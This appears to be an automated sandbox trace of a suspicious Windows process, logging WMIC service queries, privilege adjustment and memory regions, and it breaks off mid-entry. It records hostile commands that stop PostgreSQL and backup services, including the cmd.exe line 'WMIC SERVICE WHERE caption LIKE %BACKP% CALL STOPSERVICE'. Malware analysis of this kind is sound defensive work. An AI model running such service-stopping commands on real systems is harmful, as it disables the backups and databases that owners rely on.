pVal=0xd4f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.335] lstrlenW (lpString="StartService") returned 12 [0108.335] lstrlenW (lpString="STOPSERVICE") returned 11 [0108.335] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0108.335] IUnknown:Release (This=0xe78370) returned 0x1 [0108.335] SafeArrayGetElement (in: psa=0xe5f138, rgIndices=0xd4f200, pv=0xd4f234 | out: pv=0xd4f234) returned 0x0 [0108.335] IWbemClassObject:Get (in: This=0xe788a0, wszName="Name", lFlags=0, pVal=0xd4f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.335] lstrlenW (lpString="StopService") returned 11 [0108.335] lstrlenW (lpString="STOPSERVICE") returned 11 [0108.335] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0108.335] GetCurrentThreadId () returned 0xd70 [0108.335] ??0CHString@@QAE@XZ () returned 0xd4f04c [0108.335] IWbemClassObject:Get (in: This=0xe788a0, wszName="Description", lFlags=0, pVal=0xd4f01c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f01c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.336] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.336] IWbemClassObject:Get (in: This=0xe788a0, wszName="Parameters", lFlags=0, pVal=0xd4f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f1c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.336] IWbemClassObject:Get (in: This=0xe788a0, wszName="VerbType", lFlags=0, pVal=0xd4f158*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f158*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.336] IWbemClassObject:Get (in: This=0xe788a0, wszName="Derivation", lFlags=0, pVal=0xd4f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd4f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.336] lstrlenW (lpString="StopService") returned 11 [0108.336] lstrlenW (lpString="StopService") returned 11 [0108.336] IUnknown:Release (This=0xe788a0) returned 0x1 [0108.336] IUnknown:Release (This=0xe75318) returned 0x0 [0108.337] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.338] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.338] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.338] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd063de30 | out: _String="Select", _Context=0xd063de30) returned="Select" [0108.338] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063de30 | out: _String=0x0, _Context=0xd063de30) returned="*" [0108.338] lstrlenW (lpString="FROM") returned 4 [0108.338] lstrlenW (lpString="*") returned 1 [0108.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0108.338] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063de30 | out: _String=0x0, _Context=0xd063de30) returned="from" [0108.338] lstrlenW (lpString="FROM") returned 4 [0108.338] lstrlenW (lpString="from") returned 4 [0108.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0108.338] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063de30 | out: _String=0x0, _Context=0xd063de30) returned="Win32_Service" [0108.338] lstrlenW (lpString="SET") returned 3 [0108.338] lstrlenW (lpString="CALL") returned 4 [0108.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0108.338] lstrlenW (lpString="CREATE") returned 6 [0108.338] lstrlenW (lpString="CALL") returned 4 [0108.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0108.338] lstrlenW (lpString="GET") returned 3 [0108.338] lstrlenW (lpString="CALL") returned 4 [0108.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0108.338] lstrlenW (lpString="LIST") returned 4 [0108.338] lstrlenW (lpString="CALL") returned 4 [0108.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0108.339] lstrlenW (lpString="ASSOC") returned 5 [0108.339] lstrlenW (lpString="CALL") returned 4 [0108.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0108.339] WbemLocator:IUnknown:AddRef (This=0xe20500) returned 0x3 [0108.339] lstrlenW (lpString="") returned 0 [0108.339] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0108.339] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.339] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.339] GetCurrentThreadId () returned 0xd70 [0108.339] GetCurrentProcess () returned 0xffffffff [0108.339] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xd4fb4c | out: TokenHandle=0xd4fb4c*=0x278) returned 1 [0108.339] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd4fb48 | out: TokenInformation=0x0, ReturnLength=0xd4fb48) returned 0 [0108.339] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x3, TokenInformation=0x1159b70, TokenInformationLength=0x118, ReturnLength=0xd4fb48 | out: TokenInformation=0x1159b70, ReturnLength=0xd4fb48) returned 1 [0108.339] AdjustTokenPrivileges (in: TokenHandle=0x278, DisableAllPrivileges=0, NewState=0x1159b70*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0108.339] CloseHandle (hObject=0x278) returned 1 [0108.339] lstrlenW (lpString="GET") returned 3 [0108.339] lstrlenW (lpString="CALL") returned 4 [0108.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0108.339] lstrlenW (lpString="LIST") returned 4 [0108.339] lstrlenW (lpString="CALL") returned 4 [0108.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0108.339] lstrlenW (lpString="SET") returned 3 [0108.339] lstrlenW (lpString="CALL") returned 4 [0108.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0108.339] lstrlenW (lpString="CALL") returned 4 [0108.339] lstrlenW (lpString="CALL") returned 4 [0108.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0108.339] ??0CHString@@QAE@XZ () returned 0xd4fb0c [0108.340] GetCurrentThreadId () returned 0xd70 [0108.340] SysStringLen (param_1="\\\\") returned 0x2 [0108.340] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0108.340] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0108.340] SysStringLen (param_1="\\") returned 0x1 [0108.340] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0108.340] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0108.340] WbemLocator:IWbemLocator:ConnectServer (in: This=0xe20500, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xe50800) returned 0x0 [0108.433] CoSetProxyBlanket (pProxy=0xe50800, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.434] ??1CHString@@QAE@XZ () returned 0x74a66430 [0108.434] ??0CHString@@QAE@XZ () returned 0xd4fb08 [0108.434] GetCurrentThreadId () returned 0xd70 [0108.434] lstrlenA (lpString="") returned 0 [0108.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1159af0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0108.434] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.434] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.434] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd063dc8c | out: _String="Select", _Context=0xd063dc8c) returned="Select" [0108.434] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063dc8c | out: _String=0x0, _Context=0xd063dc8c) returned="*" [0108.434] lstrlenW (lpString="FROM") returned 4 [0108.434] lstrlenW (lpString="*") returned 1 [0108.434] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0108.434] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063dc8c | out: _String=0x0, _Context=0xd063dc8c) returned="from" [0108.434] lstrlenW (lpString="FROM") returned 4 [0108.434] lstrlenW (lpString="from") returned 4 [0108.434] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0108.434] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063dc8c | out: _String=0x0, _Context=0xd063dc8c) returned="Win32_Service" [0108.434] IWbemServices:GetObject (in: This=0xe50800, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xd4fae0*=0x0, ppCallResult=0x0 | out: ppObject=0xd4fae0*=0xeac2e0, ppCallResult=0x0) returned 0x0 [0108.466] IWbemClassObject:GetMethod (in: This=0xeac2e0, wszName="STOPSERVICE", lFlags=0, ppInSignature=0xd4faec, ppOutSignature=0xd4fad8 | out: ppInSignature=0xd4faec*=0x0, ppOutSignature=0xd4fad8*=0xeac660) returned 0x0 [0108.466] IUnknown:Release (This=0xeac660) returned 0x0 [0108.466] IUnknown:Release (This=0xeac2e0) returned 0x0 [0108.466] ??0CHString@@QAE@XZ () returned 0xd4f9b8 [0108.466] GetCurrentThreadId () returned 0xd70 [0108.466] lstrlenA (lpString="") returned 0 [0108.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1159af0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0108.467] lstrlenA (lpString="") returned 0 [0108.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1159af0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0108.467] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.467] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0108.467] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xd063dc14 | out: _String="Select", _Context=0xd063dc14) returned="Select" [0108.467] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063dc14 | out: _String=0x0, _Context=0xd063dc14) returned="*" [0108.467] lstrlenW (lpString="FROM") returned 4 [0108.467] lstrlenW (lpString="*") returned 1 [0108.467] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0108.467] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063dc14 | out: _String=0x0, _Context=0xd063dc14) returned="from" [0108.467] lstrlenW (lpString="FROM") returned 4 [0108.467] lstrlenW (lpString="from") returned 4 [0108.467] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0108.467] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd063dc14 | out: _String=0x0, _Context=0xd063dc14) returned="Win32_Service" [0108.467] lstrlenA (lpString="SELECT * FROM ") returned 14 [0108.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x1159fb8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0108.467] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0108.467] SysStringLen (param_1="Win32_Service") returned 0xd [0108.467] lstrlenA (lpString=" WHERE ") returned 7 [0108.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x1159f18, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0108.467] SysStringLen (param_1=" WHERE ") returned 0x7 [0108.467] SysStringLen (param_1="caption LIKE '%postgresql%'") returned 0x1b [0108.467] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0108.467] SysStringLen (param_1=" WHERE caption LIKE '%postgresql%'") returned 0x22 [0108.468] IWbemServices:ExecQuery (in: This=0xe50800, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%postgresql%'", lFlags=48, pCtx=0x0, ppEnum=0xd4f9c0 | out: ppEnum=0xd4f9c0*=0xe79288) returned 0x0 [0108.474] CoSetProxyBlanket (pProxy=0xe79288, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.477] IEnumWbemClassObject:Next (in: This=0xe79288, lTimeout=-1, uCount=0x1, apObjects=0xd4f9c4, puReturned=0xd4f9b0 | out: apObjects=0xd4f9c4*=0x0, puReturned=0xd4f9b0*=0x0) returned 0x1 [0109.088] IUnknown:Release (This=0xe79288) returned 0x0 [0109.089] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.089] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.089] GetCurrentThreadId () returned 0xd70 [0109.089] ??0CHString@@QAE@PBG@Z () returned 0xd4fb7c [0109.089] ??YCHString@@QAEABV0@PBG@Z () returned 0xd4fb7c [0109.089] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x115a020, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0109.089] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.089] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x1159a50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0109.089] __iob_func () returned 0x77ac1208 [0109.089] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0109.090] __iob_func () returned 0x77ac1208 [0109.090] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0109.091] ??1CHString@@QAE@XZ () returned 0x1 [0109.091] IUnknown:Release (This=0xe50800) returned 0x0 [0109.091] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0109.091] _kbhit () returned 0x0 [0109.092] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0109.093] WbemLocator:IUnknown:Release (This=0xe20500) returned 0x2 [0109.093] IUnknown:Release (This=0xe50990) returned 0x0 [0109.093] IUnknown:Release (This=0xe509e0) returned 0x0 [0109.093] WbemLocator:IUnknown:Release (This=0xe20500) returned 0x1 [0109.093] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0109.093] WbemLocator:IUnknown:Release (This=0xe20500) returned 0x0 [0109.094] CoUninitialize () [0109.109] exit (_Code=0) [0109.110] ??1CHString@@QAE@XZ () returned 0x74a66430 [0109.110] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 187 os_tid = 0xd74 Thread: id = 188 os_tid = 0xd78 Thread: id = 189 os_tid = 0xd7c Thread: id = 190 os_tid = 0xd80 Process: id = "37" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x43cb6000" os_pid = "0xda0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2466 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2467 start_va = 0x4d0000 end_va = 0x44cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2468 start_va = 0x44d0000 end_va = 0x44effff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 2469 start_va = 0x44f0000 end_va = 0x44f1fff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2470 start_va = 0x4500000 end_va = 0x4513fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004500000" filename = "" Region: id = 2471 start_va = 0x4520000 end_va = 0x455ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 2472 start_va = 0x4560000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 2473 start_va = 0x4660000 end_va = 0x4663fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004660000" filename = "" Region: id = 2474 start_va = 0x4670000 end_va = 0x4670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Region: id = 2475 start_va = 0x4680000 end_va = 0x4681fff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 2476 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2477 start_va = 0x7e960000 end_va = 0x7e982fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e960000" filename = "" Region: id = 2478 start_va = 0x7e986000 end_va = 0x7e986fff entry_point = 0x0 region_type = private name = "private_0x000000007e986000" filename = "" Region: id = 2479 start_va = 0x7e98b000 end_va = 0x7e98dfff entry_point = 0x0 region_type = private name = "private_0x000000007e98b000" filename = "" Region: id = 2480 start_va = 0x7e98e000 end_va = 0x7e98efff entry_point = 0x0 region_type = private name = "private_0x000000007e98e000" filename = "" Region: id = 2481 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2482 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2483 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2484 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2485 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2486 start_va = 0x4740000 end_va = 0x474ffff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 2487 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2488 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2489 start_va = 0x47a0000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 2490 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2531 start_va = 0x44d0000 end_va = 0x44dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2532 start_va = 0x4690000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 2533 start_va = 0x46f0000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 2534 start_va = 0x48a0000 end_va = 0x495dfff entry_point = 0x48a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2535 start_va = 0x4960000 end_va = 0x4a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 2536 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2537 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2538 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2539 start_va = 0x7e860000 end_va = 0x7e95ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e860000" filename = "" Region: id = 2540 start_va = 0x7e988000 end_va = 0x7e98afff entry_point = 0x0 region_type = private name = "private_0x000000007e988000" filename = "" Region: id = 2541 start_va = 0x44e0000 end_va = 0x44e3fff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 2542 start_va = 0x44f0000 end_va = 0x44f3fff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2543 start_va = 0x4a60000 end_va = 0x4d96fff entry_point = 0x4a60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 192 os_tid = 0xda4 [0109.328] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0109.328] __set_app_type (_Type=0x1) [0109.328] __p__fmode () returned 0x77ac4d6c [0109.328] __p__commode () returned 0x77ac5b1c [0109.328] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0109.329] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0109.329] GetCurrentThreadId () returned 0xda4 [0109.329] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xda4) returned 0x84 [0109.329] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0109.329] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0109.329] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.332] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.332] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x465f82c | out: phkResult=0x465f82c*=0x0) returned 0x2 [0109.332] VirtualQuery (in: lpAddress=0x465f833, lpBuffer=0x465f7e4, dwLength=0x1c | out: lpBuffer=0x465f7e4*(BaseAddress=0x465f000, AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.332] VirtualQuery (in: lpAddress=0x4560000, lpBuffer=0x465f7e4, dwLength=0x1c | out: lpBuffer=0x465f7e4*(BaseAddress=0x4560000, AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0109.332] VirtualQuery (in: lpAddress=0x4561000, lpBuffer=0x465f7e4, dwLength=0x1c | out: lpBuffer=0x465f7e4*(BaseAddress=0x4561000, AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0109.332] VirtualQuery (in: lpAddress=0x4563000, 